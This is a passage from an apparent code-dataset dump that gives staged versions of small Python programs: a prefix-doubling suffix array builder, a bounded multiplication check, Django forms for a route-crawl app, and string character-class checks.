= suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\n<mask token>\nprint(suffix_array)\n",
"step-4": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\nn = 'banana'\nsuffix_array = prefix_doubling_suffix_array(n)\nprint(suffix_array)\n",
"step-5": "\"\"\"\nSuffix Arrays - Optimized O(n log n) - prefix doubling\n\nA suffix is a non-empty substring at the end of the string. A suffix array\ncontains all the sorted suffixes of a string\n\nA suffix array provides a space efficient alternative to a suffix tree which\nitself is a compressed version of a trie. Suffix array can do something a suffix\ntree can, with some additional information such as Longest Common Prefix (LCP)\narray. \n\nA suffix array can be constructed from Suffix tree by doing a DFS traversal of\nthe suffix tree. In fact Suffix array and suffix tree both can be constructed\nfrom each other in linear time.\n\nAdvantages of suffix arrays over suffix trees include improved space\nrequirements, simpler linear time construction algorithms (e.g., compared to\nUkkonen’s algorithm) and improved cache locality \n\nsource: https://www.geeksforgeeks.org/suffix-array-set-2-a-nlognlogn-algorithm/\n\n# Algorithm\n1. The first step is to generate all the suffix starting with the whole string\n and then looping through and producing the 1 to end, 2 to end etc until the\n end character.\n2. We assign current and next rank to the first two characters of the suffixes.\n A simple rank could be str[i]-'a'. If no characters are found, set it to -1\n Index Suffix Rank Next Rank \n 0 banana 1 0\n 1 anana 0 13 \n 2 nana 13 0\n 3 ana 0 13\n 4 na 13 0 \n 5 a 0 -1 \n3. Sort the array using the current and next rank\n\t\tIndex Suffix Rank Next Rank \n 5 a 0 -1\n 1 anana 0 13 \n 3 ana 0 13\n 0 banana 1 0\n 2 nana 13 0\n 4 na 13 0 \n\t\n4. So far we sorted all the suffixes through first two characters. Now we do the\n next 4, 8 and so on until 2*len(n) times. We loop from 4 to 2N and\n calculate the current and next rank the following way.\n\n a. Current Rank - Assign 0 as the current rank for the first suffix. For\n remaining suffixes, we take the rank pair from previous iteration i.e\n (current rank, next rank) from the previous time and see if it's the\n same as the rank pair of the previous suffix. If they are the same, set\n current rank to same as previous suffix current rank, else increment by\n 1 and set it as current rank for the current suffix.\n \n Index Suffix Rank \n 5 a 0 [Assign 0 to first] \n 1 anana 1 (0, 13) is different from previous\n 3 ana 1 (0, 13) is same as previous \n 0 banana 2 (1, 0) is different from previous \n 2 nana 3 (13, 0) is different from previous \n 4 na 3 (13, 0) is same as previous \n\n\n b. Next Rank - suppose k is the loop and the initial value is 4, we take\n the subarray from k/2 to end and see what current rank is assigned for\n that suffix (i.e. suffix[k/2:].current_rank) and set that rank. If no\n suffix is found or theres no characters for k/2 to end, set it to -1\n\n Index Suffix Rank Next Rank\n 5 a 0 -1\n 1 anana 1 1 \n 3 ana 1 0 \n 0 banana 2 3\n 2 nana 3 3 \n 4 na 3 -1 \n\n5. Now sort current and next rank\n\n6. Proceed like this until k <= 2N\n\"\"\"\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n\n # base cases\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n\n # declare suffixes dictionary which will hold all the suffixes in the sorted\n # order eventually and also a current and next rank attribute to help with\n # sorting \n # suffixes = {\n # 0: {\n # \"suffix\": \"banana\",\n # \"current_rank\": None,\n # \"next_rank\": None\n # },\n # 1: {..}\n # }\n suffixes = []\n\n # generate all suffixes for n and set current rank for first character and\n # next rank for second character\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1][\"suffix\"] = n[i:]\n suffixes[i][1][\"current_rank\"] = ord(suffixes[i][1][\"suffix\"][0])\n if len(suffixes[i][1][\"suffix\"]) > 1:\n suffixes[i][1][\"next_rank\"] = ord(suffixes[i][1][\"suffix\"][1])\n else:\n suffixes[i][1][\"next_rank\"] = -1\n\n # sort the suffixes by the first two characters i.e. current and next rank.\n # Leverage the sorted() with custom key to sort the tuples by current/next\n # rank. Sorted returns a list of tuples.\n suffixes = sorted(suffixes, key=lambda x: (x[1][\"current_rank\"], x[1][\"next_rank\"]))\n\n # Now that first two characters are sorted, calculate current/next rank and\n # sort first 4, 8.. etc characters until 2*n\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n # store previous rank pair to use it to set the current rank\n prev_rank_pair = str(suffixes[0][1][\"current_rank\"]) + str(suffixes[0][1][\"next_rank\"])\n # set current rank of first suffix to 0\n suffixes[0][1][\"current_rank\"] = 0\n\n # To make the lookup easier for getting the current rank of a suffix\n # to be able to set it as the next rank, maintain a hash table with\n # suffix as the key and current rank as the value\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1][\"suffix\"]] = 0\n\n # Loop through suffix array and set the current rank based on current\n # rank pair/previous rank pair comparison.\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1][\"current_rank\"]) + str(suffixes[i][1][\"next_rank\"])\n # if current and previous are same rank pairs, set current rank of\n # the current suffix to current rank of previous suffix\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1][\"current_rank\"] = suffixes[i-1][1][\"current_rank\"]\n # else add 1 to the current rank of previous suffix and set it as\n # current rank of current suffix.\n else:\n suffixes[i][1][\"current_rank\"] = suffixes[i-1][1][\"current_rank\"] + 1\n\n # set previous rank pair to the current rank pair for the next\n # iteration check.\n prev_rank_pair = current_rank_pair\n\n curr_rank_ht[suffixes[i][1][\"suffix\"]] = suffixes[i][1][\"current_rank\"]\n\n # Loop through suffix array and set the next rank based on the current\n # rank of suffix[k/2:] and if no such suffix exists set it to -1\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1][\"suffix\"][k//2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1][\"next_rank\"] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1][\"next_rank\"] = -1\n \n\n # Now that we have set both current and next rank, sort the suffix array\n # using those two values\n suffixes = sorted(suffixes, key=lambda x: (x[1][\"current_rank\"], x[1][\"next_rank\"]))\n\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n # print(i[1][\"suffix\"])\n\n return suffix_array\n\nn = \"banana\"\nsuffix_array = prefix_doubling_suffix_array(n)\nprint(suffix_array)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mult(a, b):
if a > 9 or b > 9 or a < 1 or b < 1:
print(-1)
else:
print(a * b)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mult(a, b):
if a > 9 or b > 9 or a < 1 or b < 1:
print(-1)
else:
print(a * b)
mult(a, b)
<|reserved_special_token_1|>
a, b = map(int, input().split())
def mult(a, b):
if a > 9 or b > 9 or a < 1 or b < 1:
print(-1)
else:
print(a * b)
mult(a, b)
|
flexible
|
{
"blob_id": "991fa5f9c83a1821e62f7baacbc56a4d31982312",
"index": 3681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\nmult(a, b)\n",
"step-4": "a, b = map(int, input().split())\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\nmult(a, b)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CategoryForm(forms.ModelForm):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text=
'Please enter the category name.')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
from django import forms
from crawlr.models import Route, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text=
'Please enter the category name.')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
from django import forms
from crawlr.models import Route, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128,
help_text = "Please enter the category name.")
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = ('name',)
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128,
help_text = "Please enter the name of the Crawl")
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
#Hidden inputs for the variables retrieved from find directions page
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
#Location choice, a drop down menu selection
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts', 'created_by')
def clean_title(self):
title = self.cleaned_data["title"]
try:
Route.objects.get(title=title)
raise forms.ValidationError(
self.error_messages['duplicate_title'], # customized error message
code='duplicate_title',
)
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={'placeholder' : 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Email'}), label='', required=False)
class Meta:
model = User
fields = ('username', 'email', 'password')
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('picture',)
|
flexible
|
{
"blob_id": "abf25cf3d4435754b916fa06e5e887b1e3589a1c",
"index": 5073,
"step-1": "<mask token>\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-2": "<mask token>\n\n\nclass CategoryForm(forms.ModelForm):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-3": "<mask token>\n\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128, help_text=\n 'Please enter the category name.')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-4": "from django import forms\nfrom crawlr.models import Route, Category, UserProfile\nfrom django.contrib.auth.models import User\n\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128, help_text=\n 'Please enter the category name.')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\n class Meta:\n model = Category\n fields = 'name',\n\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':\n 'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128, help_text=\n 'Please enter the name of the Crawl')\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget\n =forms.HiddenInput())\n\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',\n 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data['title']\n try:\n Route.objects.get(title=title)\n raise forms.ValidationError(self.error_messages[\n 'duplicate_title'], code='duplicate_title')\n except Route.DoesNotExist:\n return title\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={\n 'placeholder': 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':\n 'Email'}), label='', required=False)\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password'\n\n\nclass UserProfileForm(forms.ModelForm):\n\n\n class Meta:\n model = UserProfile\n fields = 'picture',\n",
"step-5": "from django import forms\nfrom crawlr.models import Route, Category, UserProfile\nfrom django.contrib.auth.models import User\n\nclass CategoryForm(forms.ModelForm):\n name = forms.CharField(max_length=128,\n help_text = \"Please enter the category name.\")\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n class Meta:\n model = Category\n fields = ('name',)\n\nclass RouteForm(forms.ModelForm):\n error_messages = {'duplicate_title':'Please enter a unique name for the crawl'}\n title = forms.CharField(max_length=128,\n help_text = \"Please enter the name of the Crawl\")\n\n views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)\n #Hidden inputs for the variables retrieved from find directions page\n start = forms.CharField(widget=forms.HiddenInput())\n end = forms.CharField(widget=forms.HiddenInput())\n waypts = forms.CharField(widget=forms.HiddenInput())\n #Location choice, a drop down menu selection\n category = forms.ModelChoiceField(queryset=Category.objects.all())\n slug = forms.CharField(widget=forms.HiddenInput(), required=False)\n created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget=forms.HiddenInput())\n\n class Meta:\n model = Route\n fields = ('category', 'title', 'slug', 'start', 'end', 'waypts', 'created_by')\n\n def clean_title(self):\n title = self.cleaned_data[\"title\"]\n try:\n Route.objects.get(title=title)\n\n raise forms.ValidationError(\n self.error_messages['duplicate_title'], # customized error message\n code='duplicate_title',\n )\n except Route.DoesNotExist:\n return title\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput(attrs={'placeholder' : 'Password'}), label='')\n username = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Username'}), label='')\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Email'}), label='', required=False)\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n\nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('picture',)\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
"""You are given a string .
Your task is to find out if the string contains:
alphanumeric characters, alphabetical characters, digits,
lowercase and uppercase characters."""
s = raw_input()
print(any(i.isalnum()for i in s))
print(any(i.isalpha()for i in s))
print(any(i.isdigit()for i in s))
print(any(i.islower()for i in s))
print(any(i.isupper()for i in s))
""" any() in python returns
True is any of element of the iterable(list,tuple,dict,set etc) are true
to the condition else returns False."""
|
normal
|
{
"blob_id": "f29fa3d796d9d403d6bf62cb28f5009501c55545",
"index": 3650,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(any(i.isalnum() for i in s))\nprint(any(i.isalpha() for i in s))\nprint(any(i.isdigit() for i in s))\nprint(any(i.islower() for i in s))\nprint(any(i.isupper() for i in s))\n<mask token>\n",
"step-3": "<mask token>\ns = raw_input()\nprint(any(i.isalnum() for i in s))\nprint(any(i.isalpha() for i in s))\nprint(any(i.isdigit() for i in s))\nprint(any(i.islower() for i in s))\nprint(any(i.isupper() for i in s))\n<mask token>\n",
